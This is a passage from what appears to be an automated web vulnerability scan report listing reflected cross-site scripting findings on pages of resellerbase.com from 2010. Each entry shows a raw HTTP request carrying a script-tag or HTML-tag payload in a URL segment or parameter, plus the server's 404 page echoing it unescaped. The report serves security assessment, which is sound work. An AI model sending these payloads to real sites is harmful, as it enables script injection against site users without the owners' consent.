<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail64d8d<script>alert(1)</script>3ed570b4b3f/25/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1925. http://www.resellerbase.com/detail/25/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/25/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a878f<script>alert(1)</script>cfd004df1b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/25a878f<script>alert(1)</script>cfd004df1b1/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/25/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/25a878f<script>alert(1)</script>cfd004df1b1/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1926. http://www.resellerbase.com/detail/25/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/25/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 133cc<script>alert(1)</script>7ba310b6e8c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/25/search.php133cc<script>alert(1)</script>7ba310b6e8c?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/25/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/25/search.php133cc<script>alert(1)</script>7ba310b6e8c?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1927. http://www.resellerbase.com/detail/25/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/25/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload a6945<a>23587f84e74 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/25/search.php?keyword=search...&Submit3=Searcha6945<a>23587f84e74&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/25/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/25/search.php?keyword=search...&Submit3=Searcha6945<a>23587f84e74&opt=2 was not found on this server.</p>
...[SNIP]...

2.1928. http://www.resellerbase.com/detail/25/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/25/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 1ea54<a>5ed210c2793 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/25/search.php?keyword=search...1ea54<a>5ed210c2793&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/25/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/25/search.php?keyword=search...1ea54<a>5ed210c2793&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1929. http://www.resellerbase.com/detail/25/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/25/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5c5d4<script>alert(1)</script>c985f26f321 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/25/search.php?keyword=search...&Submit3=Search&opt=2&5c5d4<script>alert(1)</script>c985f26f321=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/25/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/25/search.php?keyword=search...&Submit3=Search&opt=2&5c5d4<script>alert(1)</script>c985f26f321=1 was not found on this server.</p>
...[SNIP]...

2.1930. http://www.resellerbase.com/detail/25/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/25/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 59450<a>3c8b65b8991 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/25/search.php?keyword=search...&Submit3=Search&opt=259450<a>3c8b65b8991 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/25/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/25/search.php?keyword=search...&Submit3=Search&opt=259450<a>3c8b65b8991 was not found on this server.</p>
...[SNIP]...

2.1931. http://www.resellerbase.com/detail/26/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/26/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 52303<script>alert(1)</script>bdad89b4ab5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail52303<script>alert(1)</script>bdad89b4ab5/26/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail52303<script>alert(1)</script>bdad89b4ab5/26/ was not found on this server.</p>
...[SNIP]...

2.1932. http://www.resellerbase.com/detail/26/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/26/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2ec4c<script>alert(1)</script>b5bbba9d324 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/262ec4c<script>alert(1)</script>b5bbba9d324/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/262ec4c<script>alert(1)</script>b5bbba9d324/ was not found on this server.</p>
...[SNIP]...

2.1933. http://www.resellerbase.com/detail/26/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/26/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bb697<script>alert(1)</script>8b55f045536 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/26/?bb697<script>alert(1)</script>8b55f045536=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26/?bb697<script>alert(1)</script>8b55f045536=1 was not found on this server.</p>
...[SNIP]...

2.1934. http://www.resellerbase.com/detail/26/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/26/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 640b1<script>alert(1)</script>f0f8ef12a1196916e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail640b1<script>alert(1)</script>f0f8ef12a1196916e/26/rating.php?id=26&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/26/sitesinstantly-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail640b1<script>alert(1)</script>f0f8ef12a1196916e/26/rating.php?id=26&rating=5 was not found on this server.</p>
...[SNIP]...

2.1935. http://www.resellerbase.com/detail/26/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/26/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fd0eb<script>alert(1)</script>1af1bf609c0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailfd0eb<script>alert(1)</script>1af1bf609c0/26/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailfd0eb<script>alert(1)</script>1af1bf609c0/26/rating.php was not found on this server.</p>
...[SNIP]...

2.1936. http://www.resellerbase.com/detail/26/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/26/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cac8b<script>alert(1)</script>f505c8edc0d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/26cac8b<script>alert(1)</script>f505c8edc0d/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26cac8b<script>alert(1)</script>f505c8edc0d/rating.php was not found on this server.</p>
...[SNIP]...

2.1937. http://www.resellerbase.com/detail/26/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/26/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d037a<script>alert(1)</script>ade3535984969924a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/26d037a<script>alert(1)</script>ade3535984969924a/rating.php?id=26&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/26/sitesinstantly-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26d037a<script>alert(1)</script>ade3535984969924a/rating.php?id=26&rating=5 was not found on this server.</p>
...[SNIP]...

2.1938. http://www.resellerbase.com/detail/26/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/26/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d3a33<script>alert(1)</script>b1b63546391 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/26/rating.phpd3a33<script>alert(1)</script>b1b63546391 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26/rating.phpd3a33<script>alert(1)</script>b1b63546391 was not found on this server.</p>
...[SNIP]...

2.1939. http://www.resellerbase.com/detail/26/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/26/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload af29e<script>alert(1)</script>151ec437c17fc9bbb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/26/rating.phpaf29e<script>alert(1)</script>151ec437c17fc9bbb?id=26&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/26/sitesinstantly-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26/rating.phpaf29e<script>alert(1)</script>151ec437c17fc9bbb?id=26&rating=5 was not found on this server.</p>
...[SNIP]...

2.1940. http://www.resellerbase.com/detail/26/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/26/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 75a6e<script>alert(1)</script>d68502ca322eb2359 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/26/rating.php/75a6e<script>alert(1)</script>d68502ca322eb2359?id=26&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/26/sitesinstantly-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26/rating.php/75a6e<script>alert(1)</script>d68502ca322eb2359?id=26&rating=5 was not found on this server.</p>
...[SNIP]...

2.1941. http://www.resellerbase.com/detail/26/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/26/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 70e12<script>alert(1)</script>499c33954fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/26/rating.php?70e12<script>alert(1)</script>499c33954fb=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26/rating.php?70e12<script>alert(1)</script>499c33954fb=1 was not found on this server.</p>
...[SNIP]...

2.1942. http://www.resellerbase.com/detail/26/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/26/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c63a3<script>alert(1)</script>89e8b836150 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailc63a3<script>alert(1)</script>89e8b836150/26/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/26/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailc63a3<script>alert(1)</script>89e8b836150/26/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1943. http://www.resellerbase.com/detail/26/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/26/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f8e87<script>alert(1)</script>76c1e19045b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/26f8e87<script>alert(1)</script>76c1e19045b/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/26/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:21 GMT
Server: Apache/2
